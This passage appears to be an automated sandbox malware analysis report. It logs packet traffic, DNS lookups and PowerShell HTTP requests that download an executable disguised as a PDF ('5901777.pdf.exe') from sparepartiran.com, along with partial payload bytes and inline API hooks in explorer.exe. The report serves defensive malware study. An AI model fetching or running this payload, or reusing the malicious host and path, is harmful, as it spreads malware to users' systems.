                                              Nov 27, 2020 11:38:09.203906059 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.203922987 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.203977108 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.203982115 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.204092979 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.204669952 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.204708099 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.204735041 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.204808950 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.204838037 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.204868078 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.204890966 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.204932928 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.204941988 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.204981089 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.204988003 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205029964 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205077887 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205101013 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.205122948 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205177069 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205178976 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.205195904 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205228090 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205260992 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205286980 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.205291033 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205326080 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.205358028 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.205365896 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205472946 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205522060 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205579996 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205617905 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.205624104 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205651999 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.205684900 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.205753088 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.206245899 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.206293106 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.206337929 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.206377029 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.206442118 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.206501961 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.316721916 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.316766977 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.316806078 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.316845894 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.316849947 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.316903114 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.320233107 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.320275068 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.320312977 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.320337057 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.320352077 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.320430994 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.320466042 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.320470095 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.320508957 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.320548058 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.320559025 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.320605040 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.320682049 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.320720911 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.320760965 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.320771933 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.320800066 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.320848942 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.321485043 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.321528912 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.321566105 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.321604967 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.321628094 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.321643114 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.321656942 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.321691036 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.322304964 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.324799061 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.324842930 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.324882030 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.324919939 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.324923992 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.324968100 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.324989080 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325028896 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325072050 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325118065 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325128078 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.325192928 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325233936 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325253010 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.325273991 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325289011 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.325310946 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325417995 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325476885 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.325556040 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325593948 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325634003 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325647116 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.325675011 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325687885 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.325714111 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325752974 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325790882 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325807095 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.325836897 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.325917006 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325956106 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.325994015 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.326008081 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.326030970 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.326070070 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.326082945 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.326109886 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.326951981 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.441740990 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.441806078 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.441845894 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.441884041 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.441893101 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.441922903 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.444879055 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.444947958 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.444967031 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.444999933 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.445007086 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.445072889 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.447957993 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.448012114 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.448050976 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.448069096 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.448092937 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.448190928 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.449445009 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.449490070 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.449528933 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.449570894 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.449606895 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.449624062 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.451666117 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.451708078 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.451745987 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.451764107 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.451783895 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.451832056 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.451833010 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.451877117 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.451920986 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.452363014 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.452402115 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.452451944 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.454411030 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.454452991 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.454489946 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.454518080 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.454528093 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.454713106 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.454752922 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.454766035 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.454792023 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.454797983 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.454829931 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.454875946 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.455343008 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.455394030 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.455435991 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.455473900 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.455487967 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.455519915 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.455542088 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.455591917 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.455629110 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.455676079 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.455679893 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.455756903 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.456427097 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.456485033 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.456547976 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.456597090 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.456605911 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.456635952 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.456667900 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.456698895 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.456737995 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.456881046 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.817794085 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817841053 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817883968 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.817887068 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.819077969 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.822721958 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.827645063 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827688932 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827725887 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827775002 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827780962 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.827804089 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827845097 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827852964 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.827884912 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827923059 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.827934027 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.827970982 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.828028917 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.830481052 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.831528902 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831571102 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831609011 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831636906 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.831646919 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831665993 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.831691980 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831728935 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831774950 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831784964 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.831820011 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.831868887 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.837738991 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.837793112 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.837831974 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.837848902 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.837868929 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.837883949 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.837924957 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.837968111 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.837984085 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.839776993 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.839786053 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.839809895 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.839833021 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.839848995 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.839888096 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.839899063 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.839926958 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.839975119 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840028048 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840037107 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.840065956 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840102911 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.840115070 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840157986 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840197086 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840208054 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.840238094 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840243101 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.840276003 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840317965 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840322018 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.840357065 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840389013 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.840409994 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.854986906 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:11.104043961 CET4974380192.168.2.3162.223.88.131

                                              UDP Packets


                                              DNS Queries

                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                              Nov 27, 2020 11:38:08.529928923 CET | 192.168.2.3 | 8.8.8.8 | 0x7f0 | Standard query (0) | sparepartiran.com | A (IP address) | IN (0x0001)
                                              Nov 27, 2020 11:38:08.616806984 CET | 192.168.2.3 | 8.8.8.8 | 0x37a5 | Standard query (0) | sparepartiran.com | A (IP address) | IN (0x0001)

                                              DNS Answers

                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                              Nov 27, 2020 11:38:08.674444914 CET | 8.8.8.8 | 192.168.2.3 | 0x7f0 | No error (0) | sparepartiran.com |  | 162.223.88.131 | A (IP address) | IN (0x0001)
                                              Nov 27, 2020 11:38:08.763250113 CET | 8.8.8.8 | 192.168.2.3 | 0x37a5 | No error (0) | sparepartiran.com |  | 162.223.88.131 | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • sparepartiran.com

                                              HTTP Packets

                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              0 | 192.168.2.3 | 49743 | 162.223.88.131 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Nov 27, 2020 11:38:08.837831020 CET | 4976 | OUT | GET /js/2Q/5901777.pdf.exe HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                              Host: sparepartiran.com
                                              Connection: Keep-Alive
                                              Nov 27, 2020 11:38:08.958857059 CET | 4978 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 27 Nov 2020 10:38:08 GMT
                                              Server: Apache
                                              Last-Modified: Fri, 27 Nov 2020 09:07:10 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 552960
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              1 | 192.168.2.3 | 49744 | 162.223.88.131 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Nov 27, 2020 11:38:08.898339987 CET | 4976 | OUT | GET /js/2Q/5901777.pdf.exe HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                              Host: sparepartiran.com
                                              Connection: Keep-Alive
                                              Nov 27, 2020 11:38:09.019684076 CET | 4992 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 27 Nov 2020 10:38:08 GMT
                                              Server: Apache
                                              Last-Modified: Fri, 27 Nov 2020 09:07:10 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 552960
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Ascii: AP>At [>}<O9cmi<O{|7/i<r~IK7q~5|{D S>#zz&5AP#~~Q#wZV_U>x:5A.w]]]odK;~m8bZN~6U)7^IkV{iYWSI`~ow)
                                              Nov 27, 2020 11:38:09.019896030 CET4999INData Raw: 96 91 36 e5 a1 d1 d7 e5 dd 45 2f b1 57 ea b3 77 60 75 7a 0e d0 d4 d6 d5 68 7d 9c 6b 19 82 cb 8c e0 ec 15 74 ab 87 2a 34 38 3f 84 30 3b a4 3d 40 b4 ac a2 e1 50 a3 87 79 f7 b8 e2 30 65 47 42 60 2c 97 ad e1 70 2b 90 66 ab 94 fd 90 b2 8d bc c6 46 56
                                              Data Ascii: 6E/Ww`uzh}kt*48?0;=@Py0eGB`,p+fFVcxCvPxgGC??rcc{p8s=jdk`'?t5ELy8]WiJmnh9anWc66Uc"!(rmg-O;(`q0oMP
                                              Nov 27, 2020 11:38:09.020236015 CET5000INData Raw: 8d 7b 64 22 7e d1 5d 31 28 ec 80 61 65 1c ca 77 97 69 39 29 35 d1 e9 07 cc f6 b3 dd 1b 8f 8c be 3b 1e 0d 0f 8e 70 56 a1 2f 5f a2 3e ac 92 97 be 17 79 a9 79 47 0c 80 cd 78 89 a3 d7 af 30 ec 6c 84 b1 06 2e ad fa ba 6e c2 bf 98 0a 2a 60 af 88 be ab
                                              Data Ascii: {d"~]1(aewi9)5;pV/_>yyGx0l.n*` 0-QpvCX\+WD;eE;"VjwGjlBO0k&bhViFa^|#?F7qc=TkSO{)x'ZGsLDhn{C:
                                              Nov 27, 2020 11:38:09.020278931 CET5001INData Raw: e8 7f 00 5b a8 56 11 ab b6 75 4f 92 a9 7e 5a 5d 37 45 2c 45 f4 71 03 95 8c d6 f4 68 d9 1f 24 9d 49 da f7 a4 d2 8b 73 4f af 96 e3 c1 00 bd b3 bd 07 b4 ee 83 4a 7a e5 c6 21 78 23 db ab 61 bb b1 d0 97 d9 de d9 5e 6f b7 4e c6 a3 de d9 9e ad 7b 93 2b
                                              Data Ascii: [VuO~Z]7E,Eqh$IsOJz!x#a^oN{+fY6S3V6g}BLmr"}[ElV%x_]o/uZUF]T_Uzk=?\-VA"RrHRYv8|0pGOOj<vX`[
                                              Nov 27, 2020 11:38:09.020317078 CET5003INData Raw: 5b df c7 44 35 3e 9e a7 24 10 ef 69 f8 e9 fe 04 1f c0 46 f6 cd 3b e9 0c 59 69 5e ca 1f 1b d0 8f d9 cd 40 59 3c 87 55 d3 5d 7c 2a 5c 26 e1 3b f0 f4 70 35 fd 18 b8 b5 41 0b c6 35 2d 87 a1 c3 f0 84 70 3f 53 1d d9 26 7f 3c 88 5d 57 13 6e 48 04 0d 82
                                              Data Ascii: [D5>$iF;Yi^@Y<U]|*\&;p5A5-p?S&<]WnHk@XO2FBzFaGP65wqC{Qg`oH2avu]^a" RHp?57H47WqN8>+-Ee#]|
                                              Nov 27, 2020 11:38:09.020354986 CET5004INData Raw: 7b 29 4b ea 51 34 7a 86 a2 86 e3 51 03 59 38 2b 4d d7 58 e0 d7 e0 d1 56 86 46 9f 29 8b 28 c4 6e aa b0 03 dc b1 14 c4 6a b9 5e 6a ce 5a 08 de 58 87 9a 7f bc 0e 8d 83 03 87 d1 2b a2 8a 30 bc f7 a1 75 30 35 30 7d 2f de 85 7e c1 d6 0c 6f 60 61 78 f0
                                              Data Ascii: {)KQ4zQY8+MXVF)(nj^jZX+0u050}/~o`ax)g#<%ZD#y#0}+L^g'FH{]oH C1@Kv7Z|d!e(:^G`f(kFqR!`9@`SBH5p
                                              Nov 27, 2020 11:38:09.137701035 CET5033INData Raw: f1 53 30 5f 19 3b 2d b8 65 6b 77 af b3 ad dd b8 ce e0 b6 b8 de 86 75 b3 d0 59 7c ff 14 fb 7c 09 70 2f 82 e1 96 92 9a bc 67 19 77 5b 87 0e 87 bb ac 23 93 c7 f8 38 25 33 98 c6 75 96 2d 88 12 ec 0a a4 39 2e ed a7 d8 3e ed 61 58 32 64 68 9f 63 e1 f0
                                              Data Ascii: S0_;-ekwuY||p/gw[#8%3u-9.>aX2dhcM6n)qX>H^1I}6SfVFGf0-_A*(.scN?%JP7``q}\7I5Q7[)T{^,php5!C"


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function Name    Hook Type    Active in Processes
                                              PeekMessageA     INLINE       explorer.exe
                                              PeekMessageW     INLINE       explorer.exe
                                              GetMessageW      INLINE       explorer.exe
                                              GetMessageA      INLINE       explorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function Name    Hook Type    New Data
                                              PeekMessageA     INLINE       0x48 0x8B 0xB8 0x81 0x1E 0xE0
                                              PeekMessageW     INLINE       0x48 0x8B 0xB8 0x89 0x9E 0xE0
                                              GetMessageW      INLINE       0x48 0x8B 0xB8 0x89 0x9E 0xE0
                                              GetMessageA      INLINE       0x48 0x8B 0xB8 0x81 0x1E 0xE0


                                              System Behavior

                                              General

                                              Start time:11:36:38
                                              Start date:27/11/2020
                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                              Wow64 process (32bit):true
